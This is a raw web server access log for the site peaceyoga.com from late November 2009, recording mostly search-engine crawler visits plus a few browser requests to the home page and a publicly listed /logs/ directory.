67.195.111.39 - - [26/Nov/2009:09:09:29 -0800] "GET /logs/access_090701.log HTTP/1.0" 200 45555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [26/Nov/2009:10:35:33 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [26/Nov/2009:10:35:34 -0800] "GET /logs/access_080331.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [26/Nov/2009:13:32:26 -0800] "GET /logs/access_090701.log HTTP/1.0" 200 45555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [26/Nov/2009:17:24:02 -0800] "GET /logs/access_081001.log HTTP/1.0" 200 71599 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.114.60 - - [26/Nov/2009:17:36:40 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [26/Nov/2009:17:36:43 -0800] "GET /logs/ HTTP/1.0" 200 3931 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [26/Nov/2009:17:46:47 -0800] "GET /logs/access_090201.log HTTP/1.0" 200 117565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
78.47.165.48 - - [26/Nov/2009:20:47:43 -0800] "GET / HTTP/1.0" 200 900 "-" "Opera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1" "peaceyoga.com"
67.195.111.39 - - [26/Nov/2009:22:32:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [26/Nov/2009:22:32:17 -0800] "GET /logs/access_080330.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [27/Nov/2009:00:37:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.111.39 - - [27/Nov/2009:02:03:36 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 57439 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [27/Nov/2009:14:37:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [27/Nov/2009:14:37:52 -0800] "GET /logs/?S=A HTTP/1.0" 200 3931 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
65.55.106.155 - - [28/Nov/2009:00:29:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
65.55.106.155 - - [28/Nov/2009:00:31:42 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "peaceyoga.com"
119.63.198.57 - - [28/Nov/2009:00:54:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.peaceyoga.com"
213.122.174.227 - - [28/Nov/2009:03:30:29 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8" "peaceyoga.com"
93.158.145.27 - - [28/Nov/2009:10:22:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.114.60 - - [28/Nov/2009:13:49:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [28/Nov/2009:13:49:30 -0800] "GET /logs/access_080905.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.39 - - [28/Nov/2009:15:32:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [28/Nov/2009:15:32:32 -0800] "GET /?N=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [29/Nov/2009:06:07:13 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
208.115.111.250 - - [29/Nov/2009:09:56:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "peaceyoga.com"
208.115.111.250 - - [29/Nov/2009:12:54:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "peaceyoga.com"
74.72.144.187 - - [29/Nov/2009:16:45:56 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:14 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:15 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:21 -0800] "GET /_private/ HTTP/1.1" 403 - "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:25 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:27 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:28 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:28 -0800] "GET / HTTP/1.0" 200 900 "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:33 -0800] "GET /logs/ HTTP/1.1" 200 3947 "http://www.peaceyoga.com/?N=D" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:37 -0800] "GET /logs/access.log HTTP/1.1" 200 80787 "http://www.peaceyoga.com/logs/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:41 -0800] "GET /logs/access_081001.log HTTP/1.1" 200 71599 "http://www.peaceyoga.com/logs/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:45 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/?N=D" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
213.46.158.240 - - [29/Nov/2009:17:50:46 -0800] "GET / HTTP/1.1" 200 916 "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
67.195.114.60 - - [29/Nov/2009:20:17:50 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [29/Nov/2009:20:17:51 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [29/Nov/2009:22:49:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [29/Nov/2009:22:49:19 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.39 - - [30/Nov/2009:01:47:13 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [30/Nov/2009:01:47:17 -0800] "GET /logs/access_090331.log HTTP/1.0" 200 1128 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
95.108.142.150 - - [30/Nov/2009:14:40:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [30/Nov/2009:14:40:57 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [30/Nov/2009:14:41:04 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"